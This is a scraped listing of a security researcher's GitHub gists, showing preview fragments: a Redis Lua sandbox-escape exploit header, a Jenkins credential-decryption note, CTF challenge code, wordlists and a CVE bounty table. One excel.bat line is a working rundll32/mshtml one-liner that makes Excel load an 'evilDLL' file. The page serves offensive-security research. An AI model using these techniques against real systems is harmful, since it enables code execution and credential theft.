This is orange!

Orange Tsai orangetw

orangetw /
Created Nov 19, 2017 — forked from nicolas-grekas/
Advanced handling of HTTP requests in PHP
View introspection-query.graphql
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
directives {
orangetw / all.txt
Created Sep 7, 2018 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
View all.txt
orangetw /
Created Feb 12, 2019 — forked from c3c/
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system"
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
View bounties.csv
cve product bounty source
CVE-2014-0257 .NET Framework 5,000.00
CVE-2015-3842 Android 2,000.00
CVE-2015-3847 Android 1,500.00
CVE-2015-3860 Android 500.00
CVE-2015-3862 Android 333.00
CVE-2015-3865 Android 1,500.00
CVE-2015-3867 Android 4,000.00
CVE-2015-3868 Android 4,000.00
CVE-2015-3869 Android 3,000.00
View jenkins-decrypt.groovy
#To Decrypt Jenkins Password from credentials.xml
#go to the jenkins url
#In the console paste the script
orangetw / excel.bat
Created Jul 22, 2017 — forked from ryhanson/
Execute DLL via the Excel.Application object's RegisterXLL() method
View excel.bat
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
#!/usr/bin/sudo sh
## -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+.
## From `strings`:
## > This obfuscation is intended to discourage GitHub Enterprise customers
## > from making modifications to the VM.
## Well, good, as long as it's not intended to discourage *me* from doing this!
orangetw / babyfirst.php
Created Oct 19, 2015
HITCON CTF 2015 Quals Babyfirst
View babyfirst.php
$dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
if ( !file_exists($dir) )
$args = $_GET['args'];
for ( $i=0; $i<count($args); $i++ ){
orangetw / sqlpwn.php
Created Sep 10, 2015
AIS3 Final CTF Web
View sqlpwn.php
sqlpwn by orange
Don't brute force or you will be banned !
include "template.html";